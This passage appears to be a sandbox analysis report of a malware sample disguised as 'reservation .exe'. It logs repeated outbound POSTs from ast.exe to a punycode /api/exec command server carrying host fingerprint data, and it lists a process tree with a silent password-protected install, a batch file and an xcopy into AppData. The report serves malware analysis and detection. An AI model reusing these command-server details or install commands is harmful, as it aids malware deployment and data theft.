00 34 2e 35 2d 33 30 32 34 39 34 01 30 2f 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 20 28 31 30 2e 30 2e
                                                                                                                          Data Ascii: 1McC-F4-BB-57-0D-C9HS53687091200HVvsqlhtdvunkiHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c296b8597ff74a7a66f4011f385HS05368709120064.5-3024940/Microsoft Windows 10 Pro (10.0.


Session ID: 40
Source IP: 192.168.2.5
Source Port: 50117
Destination IP: 212.193.169.65
Destination Port: 443
PID: 3380
Process: C:\Users\user\AppData\Roaming\fat\ast.exe

Timestamp: 2024-11-19 18:15:54 UTC | Bytes transferred: 134 | Direction: OUT
POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
Host: id.xn--80akicokc0aablc.xn--p1ai:443
Content-Length: 269
                                                                                                                          2024-11-19 18:15:54 UTC269OUTData Raw: 01 31 00 00 0d 01 00 00 00 00 00 00 bf 00 00 00 4d 02 63 43 2d 46 34 2d 42 42 2d 35 37 2d 30 44 2d 43 39 01 03 48 53 02 35 33 36 38 37 30 39 31 32 30 30 03 48 56 02 76 73 71 6c 68 74 64 76 75 6e 6b 69 03 48 4e 02 36 5a 4b 45 45 4d 56 44 03 43 50 02 30 30 30 38 2d 30 36 46 38 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 20 3a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 03 48 4e 30 02 30 36 30 30 32 63 32 39 36 62 38 35 39 37 66 66 37 34 61 37 61 36 36 66 34 30 31 31 66 33 38 35 03 48 53 30 02 35 33 36 38 37 30 39 31 32 30 30 03 36 00 00 00 34 2e 35 2d 33 30 32 34 39 34 01 30 2f 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 20 28 31 30 2e 30 2e
                                                                                                                          Data Ascii: 1McC-F4-BB-57-0D-C9HS53687091200HVvsqlhtdvunkiHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c296b8597ff74a7a66f4011f385HS05368709120064.5-3024940/Microsoft Windows 10 Pro (10.0.


Session ID: 41
Source IP: 192.168.2.5
Source Port: 50120
Destination IP: 212.193.169.65
Destination Port: 443
PID: 3380
Process: C:\Users\user\AppData\Roaming\fat\ast.exe

Timestamp: 2024-11-19 18:15:55 UTC | Bytes transferred: 134 | Direction: OUT
POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
Host: id.xn--80akicokc0aablc.xn--p1ai:443
Content-Length: 269
                                                                                                                          2024-11-19 18:15:55 UTC269OUTData Raw: 01 31 00 00 0d 01 00 00 00 00 00 00 bf 00 00 00 4d 02 63 43 2d 46 34 2d 42 42 2d 35 37 2d 30 44 2d 43 39 01 03 48 53 02 35 33 36 38 37 30 39 31 32 30 30 03 48 56 02 76 73 71 6c 68 74 64 76 75 6e 6b 69 03 48 4e 02 36 5a 4b 45 45 4d 56 44 03 43 50 02 30 30 30 38 2d 30 36 46 38 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 20 3a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 03 48 4e 30 02 30 36 30 30 32 63 32 39 36 62 38 35 39 37 66 66 37 34 61 37 61 36 36 66 34 30 31 31 66 33 38 35 03 48 53 30 02 35 33 36 38 37 30 39 31 32 30 30 03 36 00 00 00 34 2e 35 2d 33 30 32 34 39 34 01 30 2f 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 20 28 31 30 2e 30 2e
                                                                                                                          Data Ascii: 1McC-F4-BB-57-0D-C9HS53687091200HVvsqlhtdvunkiHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c296b8597ff74a7a66f4011f385HS05368709120064.5-3024940/Microsoft Windows 10 Pro (10.0.


Session ID: 42
Source IP: 192.168.2.5
Source Port: 50123
Destination IP: 212.193.169.65
Destination Port: 443
PID: 3380
Process: C:\Users\user\AppData\Roaming\fat\ast.exe

Timestamp: 2024-11-19 18:15:56 UTC | Bytes transferred: 134 | Direction: OUT
POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
Host: id.xn--80akicokc0aablc.xn--p1ai:443
Content-Length: 269
                                                                                                                          2024-11-19 18:15:56 UTC269OUTData Raw: 01 31 00 00 0d 01 00 00 00 00 00 00 bf 00 00 00 4d 02 63 43 2d 46 34 2d 42 42 2d 35 37 2d 30 44 2d 43 39 01 03 48 53 02 35 33 36 38 37 30 39 31 32 30 30 03 48 56 02 76 73 71 6c 68 74 64 76 75 6e 6b 69 03 48 4e 02 36 5a 4b 45 45 4d 56 44 03 43 50 02 30 30 30 38 2d 30 36 46 38 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 20 3a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 03 48 4e 30 02 30 36 30 30 32 63 32 39 36 62 38 35 39 37 66 66 37 34 61 37 61 36 36 66 34 30 31 31 66 33 38 35 03 48 53 30 02 35 33 36 38 37 30 39 31 32 30 30 03 36 00 00 00 34 2e 35 2d 33 30 32 34 39 34 01 30 2f 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 20 28 31 30 2e 30 2e
                                                                                                                          Data Ascii: 1McC-F4-BB-57-0D-C9HS53687091200HVvsqlhtdvunkiHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c296b8597ff74a7a66f4011f385HS05368709120064.5-3024940/Microsoft Windows 10 Pro (10.0.


Session ID: 43
Source IP: 192.168.2.5
Source Port: 50126
Destination IP: 212.193.169.65
Destination Port: 443
PID: 3380
Process: C:\Users\user\AppData\Roaming\fat\ast.exe

Timestamp: 2024-11-19 18:15:57 UTC | Bytes transferred: 134 | Direction: OUT
POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
Host: id.xn--80akicokc0aablc.xn--p1ai:443
Content-Length: 269
                                                                                                                          2024-11-19 18:15:57 UTC269OUTData Raw: 01 31 00 00 0d 01 00 00 00 00 00 00 bf 00 00 00 4d 02 63 43 2d 46 34 2d 42 42 2d 35 37 2d 30 44 2d 43 39 01 03 48 53 02 35 33 36 38 37 30 39 31 32 30 30 03 48 56 02 76 73 71 6c 68 74 64 76 75 6e 6b 69 03 48 4e 02 36 5a 4b 45 45 4d 56 44 03 43 50 02 30 30 30 38 2d 30 36 46 38 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 20 3a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 03 48 4e 30 02 30 36 30 30 32 63 32 39 36 62 38 35 39 37 66 66 37 34 61 37 61 36 36 66 34 30 31 31 66 33 38 35 03 48 53 30 02 35 33 36 38 37 30 39 31 32 30 30 03 36 00 00 00 34 2e 35 2d 33 30 32 34 39 34 01 30 2f 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 20 28 31 30 2e 30 2e
                                                                                                                          Data Ascii: 1McC-F4-BB-57-0D-C9HS53687091200HVvsqlhtdvunkiHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c296b8597ff74a7a66f4011f385HS05368709120064.5-3024940/Microsoft Windows 10 Pro (10.0.


Session ID: 44
Source IP: 192.168.2.5
Source Port: 50129
Destination IP: 212.193.169.65
Destination Port: 443
PID: 3380
Process: C:\Users\user\AppData\Roaming\fat\ast.exe

Timestamp: 2024-11-19 18:15:58 UTC | Bytes transferred: 134 | Direction: OUT
POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
Host: id.xn--80akicokc0aablc.xn--p1ai:443
Content-Length: 269
                                                                                                                          2024-11-19 18:15:58 UTC269OUTData Raw: 01 31 00 00 0d 01 00 00 00 00 00 00 bf 00 00 00 4d 02 63 43 2d 46 34 2d 42 42 2d 35 37 2d 30 44 2d 43 39 01 03 48 53 02 35 33 36 38 37 30 39 31 32 30 30 03 48 56 02 76 73 71 6c 68 74 64 76 75 6e 6b 69 03 48 4e 02 36 5a 4b 45 45 4d 56 44 03 43 50 02 30 30 30 38 2d 30 36 46 38 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 20 3a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 03 48 4e 30 02 30 36 30 30 32 63 32 39 36 62 38 35 39 37 66 66 37 34 61 37 61 36 36 66 34 30 31 31 66 33 38 35 03 48 53 30 02 35 33 36 38 37 30 39 31 32 30 30 03 36 00 00 00 34 2e 35 2d 33 30 32 34 39 34 01 30 2f 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 20 28 31 30 2e 30 2e
                                                                                                                          Data Ascii: 1McC-F4-BB-57-0D-C9HS53687091200HVvsqlhtdvunkiHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c296b8597ff74a7a66f4011f385HS05368709120064.5-3024940/Microsoft Windows 10 Pro (10.0.


Session ID: 45
Source IP: 192.168.2.5
Source Port: 50132
Destination IP: 212.193.169.65
Destination Port: 443
PID: 3380
Process: C:\Users\user\AppData\Roaming\fat\ast.exe

Timestamp: 2024-11-19 18:15:59 UTC | Bytes transferred: 134 | Direction: OUT
POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
Host: id.xn--80akicokc0aablc.xn--p1ai:443
Content-Length: 269
                                                                                                                          2024-11-19 18:15:59 UTC269OUTData Raw: 01 31 00 00 0d 01 00 00 00 00 00 00 bf 00 00 00 4d 02 63 43 2d 46 34 2d 42 42 2d 35 37 2d 30 44 2d 43 39 01 03 48 53 02 35 33 36 38 37 30 39 31 32 30 30 03 48 56 02 76 73 71 6c 68 74 64 76 75 6e 6b 69 03 48 4e 02 36 5a 4b 45 45 4d 56 44 03 43 50 02 30 30 30 38 2d 30 36 46 38 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 20 3a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 03 48 4e 30 02 30 36 30 30 32 63 32 39 36 62 38 35 39 37 66 66 37 34 61 37 61 36 36 66 34 30 31 31 66 33 38 35 03 48 53 30 02 35 33 36 38 37 30 39 31 32 30 30 03 36 00 00 00 34 2e 35 2d 33 30 32 34 39 34 01 30 2f 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 20 28 31 30 2e 30 2e
                                                                                                                          Data Ascii: 1McC-F4-BB-57-0D-C9HS53687091200HVvsqlhtdvunkiHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c296b8597ff74a7a66f4011f385HS05368709120064.5-3024940/Microsoft Windows 10 Pro (10.0.


Session ID: 46
Source IP: 192.168.2.5
Source Port: 50141
Destination IP: 212.193.169.65
Destination Port: 443
PID: 3380
Process: C:\Users\user\AppData\Roaming\fat\ast.exe

Timestamp: 2024-11-19 18:16:01 UTC | Bytes transferred: 134 | Direction: OUT
POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
Host: id.xn--80akicokc0aablc.xn--p1ai:443
Content-Length: 269
                                                                                                                          2024-11-19 18:16:01 UTC269OUTData Raw: 01 31 00 00 0d 01 00 00 00 00 00 00 bf 00 00 00 4d 02 63 43 2d 46 34 2d 42 42 2d 35 37 2d 30 44 2d 43 39 01 03 48 53 02 35 33 36 38 37 30 39 31 32 30 30 03 48 56 02 76 73 71 6c 68 74 64 76 75 6e 6b 69 03 48 4e 02 36 5a 4b 45 45 4d 56 44 03 43 50 02 30 30 30 38 2d 30 36 46 38 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 20 3a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 03 48 4e 30 02 30 36 30 30 32 63 32 39 36 62 38 35 39 37 66 66 37 34 61 37 61 36 36 66 34 30 31 31 66 33 38 35 03 48 53 30 02 35 33 36 38 37 30 39 31 32 30 30 03 36 00 00 00 34 2e 35 2d 33 30 32 34 39 34 01 30 2f 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 20 28 31 30 2e 30 2e
                                                                                                                          Data Ascii: 1McC-F4-BB-57-0D-C9HS53687091200HVvsqlhtdvunkiHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c296b8597ff74a7a66f4011f385HS05368709120064.5-3024940/Microsoft Windows 10 Pro (10.0.


Session ID: 47
Source IP: 192.168.2.5
Source Port: 50144
Destination IP: 212.193.169.65
Destination Port: 443
PID: 3380
Process: C:\Users\user\AppData\Roaming\fat\ast.exe

Timestamp: 2024-11-19 18:16:02 UTC | Bytes transferred: 134 | Direction: OUT
POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
Host: id.xn--80akicokc0aablc.xn--p1ai:443
Content-Length: 269
                                                                                                                          2024-11-19 18:16:02 UTC269OUTData Raw: 01 31 00 00 0d 01 00 00 00 00 00 00 bf 00 00 00 4d 02 63 43 2d 46 34 2d 42 42 2d 35 37 2d 30 44 2d 43 39 01 03 48 53 02 35 33 36 38 37 30 39 31 32 30 30 03 48 56 02 76 73 71 6c 68 74 64 76 75 6e 6b 69 03 48 4e 02 36 5a 4b 45 45 4d 56 44 03 43 50 02 30 30 30 38 2d 30 36 46 38 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 20 3a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 03 48 4e 30 02 30 36 30 30 32 63 32 39 36 62 38 35 39 37 66 66 37 34 61 37 61 36 36 66 34 30 31 31 66 33 38 35 03 48 53 30 02 35 33 36 38 37 30 39 31 32 30 30 03 36 00 00 00 34 2e 35 2d 33 30 32 34 39 34 01 30 2f 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 20 28 31 30 2e 30 2e
                                                                                                                          Data Ascii: 1McC-F4-BB-57-0D-C9HS53687091200HVvsqlhtdvunkiHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c296b8597ff74a7a66f4011f385HS05368709120064.5-3024940/Microsoft Windows 10 Pro (10.0.


Session ID: 48
Source IP: 192.168.2.5
Source Port: 50147
Destination IP: 212.193.169.65
Destination Port: 443
PID: 3380
Process: C:\Users\user\AppData\Roaming\fat\ast.exe

Timestamp: 2024-11-19 18:16:03 UTC | Bytes transferred: 134 | Direction: OUT
POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
Host: id.xn--80akicokc0aablc.xn--p1ai:443
Content-Length: 269
                                                                                                                          2024-11-19 18:16:03 UTC269OUTData Raw: 01 31 00 00 0d 01 00 00 00 00 00 00 bf 00 00 00 4d 02 63 43 2d 46 34 2d 42 42 2d 35 37 2d 30 44 2d 43 39 01 03 48 53 02 35 33 36 38 37 30 39 31 32 30 30 03 48 56 02 76 73 71 6c 68 74 64 76 75 6e 6b 69 03 48 4e 02 36 5a 4b 45 45 4d 56 44 03 43 50 02 30 30 30 38 2d 30 36 46 38 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 20 3a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 03 48 4e 30 02 30 36 30 30 32 63 32 39 36 62 38 35 39 37 66 66 37 34 61 37 61 36 36 66 34 30 31 31 66 33 38 35 03 48 53 30 02 35 33 36 38 37 30 39 31 32 30 30 03 36 00 00 00 34 2e 35 2d 33 30 32 34 39 34 01 30 2f 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 20 28 31 30 2e 30 2e
                                                                                                                          Data Ascii: 1McC-F4-BB-57-0D-C9HS53687091200HVvsqlhtdvunkiHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c296b8597ff74a7a66f4011f385HS05368709120064.5-3024940/Microsoft Windows 10 Pro (10.0.


Session ID: 49
Source IP: 192.168.2.5
Source Port: 50150
Destination IP: 212.193.169.65
Destination Port: 443
PID: 3380
Process: C:\Users\user\AppData\Roaming\fat\ast.exe

Timestamp: 2024-11-19 18:16:05 UTC | Bytes transferred: 134 | Direction: OUT
POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
Host: id.xn--80akicokc0aablc.xn--p1ai:443
Content-Length: 269
                                                                                                                          2024-11-19 18:16:05 UTC269OUTData Raw: 01 31 00 00 0d 01 00 00 00 00 00 00 bf 00 00 00 4d 02 63 43 2d 46 34 2d 42 42 2d 35 37 2d 30 44 2d 43 39 01 03 48 53 02 35 33 36 38 37 30 39 31 32 30 30 03 48 56 02 76 73 71 6c 68 74 64 76 75 6e 6b 69 03 48 4e 02 36 5a 4b 45 45 4d 56 44 03 43 50 02 30 30 30 38 2d 30 36 46 38 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 20 3a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 03 48 4e 30 02 30 36 30 30 32 63 32 39 36 62 38 35 39 37 66 66 37 34 61 37 61 36 36 66 34 30 31 31 66 33 38 35 03 48 53 30 02 35 33 36 38 37 30 39 31 32 30 30 03 36 00 00 00 34 2e 35 2d 33 30 32 34 39 34 01 30 2f 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 20 28 31 30 2e 30 2e
                                                                                                                          Data Ascii: 1McC-F4-BB-57-0D-C9HS53687091200HVvsqlhtdvunkiHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c296b8597ff74a7a66f4011f385HS05368709120064.5-3024940/Microsoft Windows 10 Pro (10.0.


Session ID: 50
Source IP: 192.168.2.5
Source Port: 50153
Destination IP: 212.193.169.65
Destination Port: 443
PID: 3380
Process: C:\Users\user\AppData\Roaming\fat\ast.exe

Timestamp: 2024-11-19 18:16:06 UTC | Bytes transferred: 134 | Direction: OUT
POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
Host: id.xn--80akicokc0aablc.xn--p1ai:443
Content-Length: 269
                                                                                                                          2024-11-19 18:16:06 UTC269OUTData Raw: 01 31 00 00 0d 01 00 00 00 00 00 00 bf 00 00 00 4d 02 63 43 2d 46 34 2d 42 42 2d 35 37 2d 30 44 2d 43 39 01 03 48 53 02 35 33 36 38 37 30 39 31 32 30 30 03 48 56 02 76 73 71 6c 68 74 64 76 75 6e 6b 69 03 48 4e 02 36 5a 4b 45 45 4d 56 44 03 43 50 02 30 30 30 38 2d 30 36 46 38 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 20 3a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 03 48 4e 30 02 30 36 30 30 32 63 32 39 36 62 38 35 39 37 66 66 37 34 61 37 61 36 36 66 34 30 31 31 66 33 38 35 03 48 53 30 02 35 33 36 38 37 30 39 31 32 30 30 03 36 00 00 00 34 2e 35 2d 33 30 32 34 39 34 01 30 2f 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 20 28 31 30 2e 30 2e
                                                                                                                          Data Ascii: 1McC-F4-BB-57-0D-C9HS53687091200HVvsqlhtdvunkiHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c296b8597ff74a7a66f4011f385HS05368709120064.5-3024940/Microsoft Windows 10 Pro (10.0.


Session ID: 51
Source IP: 192.168.2.5
Source Port: 50156
Destination IP: 212.193.169.65
Destination Port: 443
PID: 3380
Process: C:\Users\user\AppData\Roaming\fat\ast.exe

Timestamp: 2024-11-19 18:16:06 UTC | Bytes transferred: 134 | Direction: OUT
POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
Host: id.xn--80akicokc0aablc.xn--p1ai:443
Content-Length: 269
                                                                                                                          2024-11-19 18:16:06 UTC269OUTData Raw: 01 31 00 00 0d 01 00 00 00 00 00 00 bf 00 00 00 4d 02 63 43 2d 46 34 2d 42 42 2d 35 37 2d 30 44 2d 43 39 01 03 48 53 02 35 33 36 38 37 30 39 31 32 30 30 03 48 56 02 76 73 71 6c 68 74 64 76 75 6e 6b 69 03 48 4e 02 36 5a 4b 45 45 4d 56 44 03 43 50 02 30 30 30 38 2d 30 36 46 38 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 20 3a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 03 48 4e 30 02 30 36 30 30 32 63 32 39 36 62 38 35 39 37 66 66 37 34 61 37 61 36 36 66 34 30 31 31 66 33 38 35 03 48 53 30 02 35 33 36 38 37 30 39 31 32 30 30 03 36 00 00 00 34 2e 35 2d 33 30 32 34 39 34 01 30 2f 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 31 30 20 50 72 6f 20 28 31 30 2e 30 2e
                                                                                                                          Data Ascii: 1McC-F4-BB-57-0D-C9HS53687091200HVvsqlhtdvunkiHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c296b8597ff74a7a66f4011f385HS05368709120064.5-3024940/Microsoft Windows 10 Pro (10.0.


Session ID: 52
Source IP: 192.168.2.5
Source Port: 50159
Destination IP: 212.193.169.65
Destination Port: 443
PID: 3380
Process: C:\Users\user\AppData\Roaming\fat\ast.exe

Timestamp: 2024-11-19 18:16:11 UTC | Bytes transferred: 134 | Direction: OUT
POST https://id.xn--80akicokc0aablc.xn--p1ai:443/api/exec HTTP/1.1
Host: id.xn--80akicokc0aablc.xn--p1ai:443
Content-Length: 269
2024-11-19 18:16:11 UTC | 269 | OUT | Data Ascii: 1McC-F4-BB-57-0D-C9HS53687091200HVvsqlhtdvunkiHN6ZKEEMVDCP0008-06F8-0000-0000-0000-0000 : Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHzHN006002c296b8597ff74a7a66f4011f385HS05368709120064.5-3024940/Microsoft Windows 10 Pro (10.0.


                                                                                                                          Target ID:0
                                                                                                                          Start time:13:13:59
                                                                                                                          Start date:19/11/2024
                                                                                                                          Path:C:\Users\user\Desktop\reservation .exe
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:"C:\Users\user\Desktop\reservation .exe"
                                                                                                                          Imagebase:0x400000
                                                                                                                          File size:7'988'632 bytes
                                                                                                                          MD5 hash:DED33758F9470A6EE7CCABA58301F651
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:Borland Delphi
                                                                                                                          Reputation:low
                                                                                                                          Has exited:true

                                                                                                                          Target ID:2
                                                                                                                          Start time:13:14:00
                                                                                                                          Start date:19/11/2024
                                                                                                                          Path:C:\Users\user\AppData\Local\Temp\is-GMPCP.tmp\reservation .tmp
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:"C:\Users\user\AppData\Local\Temp\is-GMPCP.tmp\reservation .tmp" /SL5="$10464,7120736,816128,C:\Users\user\Desktop\reservation .exe"
                                                                                                                          Imagebase:0x400000
                                                                                                                          File size:3'152'384 bytes
                                                                                                                          MD5 hash:D3E870E4BBE9AAF106AB9B0510956A89
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:Borland Delphi
                                                                                                                          Antivirus matches:
                                                                                                                          • Detection: 0%, ReversingLabs
                                                                                                                          Reputation:low
                                                                                                                          Has exited:true

                                                                                                                          Target ID:3
                                                                                                                          Start time:13:14:00
                                                                                                                          Start date:19/11/2024
                                                                                                                          Path:C:\Users\user\Desktop\reservation .exe
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:"C:\Users\user\Desktop\reservation .exe" /verysilent /password=84t66giu
                                                                                                                          Imagebase:0x400000
                                                                                                                          File size:7'988'632 bytes
                                                                                                                          MD5 hash:DED33758F9470A6EE7CCABA58301F651
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:Borland Delphi
                                                                                                                          Reputation:low
                                                                                                                          Has exited:true

                                                                                                                          Target ID:4
                                                                                                                          Start time:13:14:00
                                                                                                                          Start date:19/11/2024
                                                                                                                          Path:C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmp
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:"C:\Users\user\AppData\Local\Temp\is-4SM5O.tmp\reservation .tmp" /SL5="$2046A,7120736,816128,C:\Users\user\Desktop\reservation .exe" /verysilent /password=84t66giu
                                                                                                                          Imagebase:0x400000
                                                                                                                          File size:3'152'384 bytes
                                                                                                                          MD5 hash:D3E870E4BBE9AAF106AB9B0510956A89
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:Borland Delphi
                                                                                                                          Antivirus matches:
                                                                                                                          • Detection: 0%, ReversingLabs
                                                                                                                          Reputation:low
                                                                                                                          Has exited:true

                                                                                                                          Target ID:6
                                                                                                                          Start time:13:14:41
                                                                                                                          Start date:19/11/2024
                                                                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:"C:\Windows\system32\cmd.exe" /C ""C:\Users\user\AppData\Local\Temp\qilq\g3ll5lm.bat""
                                                                                                                          Imagebase:0x790000
                                                                                                                          File size:236'544 bytes
                                                                                                                          MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Reputation:high
                                                                                                                          Has exited:true

                                                                                                                          Target ID:7
                                                                                                                          Start time:13:14:41
                                                                                                                          Start date:19/11/2024
                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                          Imagebase:0x7ff6d64d0000
                                                                                                                          File size:862'208 bytes
                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Reputation:high
                                                                                                                          Has exited:true

                                                                                                                          Target ID:8
                                                                                                                          Start time:13:14:41
                                                                                                                          Start date:19/11/2024
                                                                                                                          Path:C:\Windows\SysWOW64\xcopy.exe
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:xcopy /Y /I /S "C:\Users\user\AppData\Local\Temp\qilq\*" "C:\Users\user\AppData\Roaming\fat\"
                                                                                                                          Imagebase:0x2a0000
                                                                                                                          File size:43'520 bytes
                                                                                                                          MD5 hash:7E9B7CE496D09F70C072930940F9F02C
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Reputation:moderate
                                                                                                                          Has exited:true

                                                                                                                          Target ID:10
                                                                                                                          Start time:13:15:09
                                                                                                                          Start date:19/11/2024
                                                                                                                          Path:C:\Users\user\AppData\Roaming\fat\ast.exe
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:"C:\Users\user\AppData\Roaming\fat\ast.exe"
                                                                                                                          Imagebase:0x400000
                                                                                                                          File size:7'543'992 bytes
